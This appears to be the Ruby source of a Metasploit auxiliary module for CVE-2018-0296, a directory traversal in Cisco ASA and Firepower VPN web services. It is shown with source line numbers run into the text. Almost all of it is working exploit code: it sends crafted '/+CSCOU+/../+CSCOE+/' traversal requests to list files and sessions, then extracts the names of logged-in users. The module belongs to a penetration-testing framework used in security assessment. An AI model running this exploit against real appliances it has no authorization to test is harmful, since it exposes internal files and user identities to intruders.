Path: blob/master/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary67include Msf::Exploit::Remote::HttpClient89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Cisco ASA Directory Traversal',14'Description' => %q{15This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.16It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.17},18'Author' => [19'Michał Bentkowski', # Discovery20'Yassine Aboukir', # PoC21'Shelby Pace' # Metasploit Module22],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2018-0296' ],26[ 'EDB', '44956' ]27],28'DisclosureDate' => '2018-06-06',29'Notes' => {30'Reliability' => UNKNOWN_RELIABILITY,31'Stability' => UNKNOWN_STABILITY,32'SideEffects' => UNKNOWN_SIDE_EFFECTS33}34)35)3637register_options(38[39OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),40OptBool.new('SSL', [ true, 'Use SSL', true ]),41Opt::RPORT(443)42]43)44end4546def is_accessible?47uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')4849res = send_request_cgi(50'method' => 'GET',51'uri' => uri52)5354return (res && (res.body.include?("SSL VPN Service") || res.body.include?("+CSCOE+") || res.body.include?("+webvpn+") || res.body.include?("webvpnlogin")))55end5657def list_files(path)58uri = normalize_uri(target_uri.path, path)5960list_res = send_request_cgi(61'method' => 'GET',62'uri' => uri63)6465if list_res && list_res.code == 20066if list_res.body.match(/\/{3}sessions/)67get_sessions(list_res.body)68else69print_good(list_res.body)70end71end72end7374def get_sessions(response)75session_nos = response.scan(/([0-9]{2,})/)7677if session_nos.empty?78print_status("Could not detect any sessions")79print("\n")80return81end8283print_good(response)84list_users(session_nos)85end8687def list_users(sessions)88sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'89user_ids = Array.new9091sessions.each do |session_no|92users_res = send_request_cgi(93'method' => 'GET',94'uri' => normalize_uri(target_uri.path, sessions_uri, session_no)95)9697if users_res && users_res.body.include?('name')98user_ids.push(users_res.body.match(/user:(\w+)/).to_s)99end100end101102unless user_ids.empty?103print_status('Users logged in:')104user_ids.each { |id| print_good(id) }105print("\n")106return107end108109print_status("There are no users logged in currently")110end111112def run113file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'114sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'115cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'116117paths = [file_uri, sessions_uri, cscoe_uri]118119unless is_accessible?120fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')121end122123paths.each { |path| list_files(path) }124end125end126127128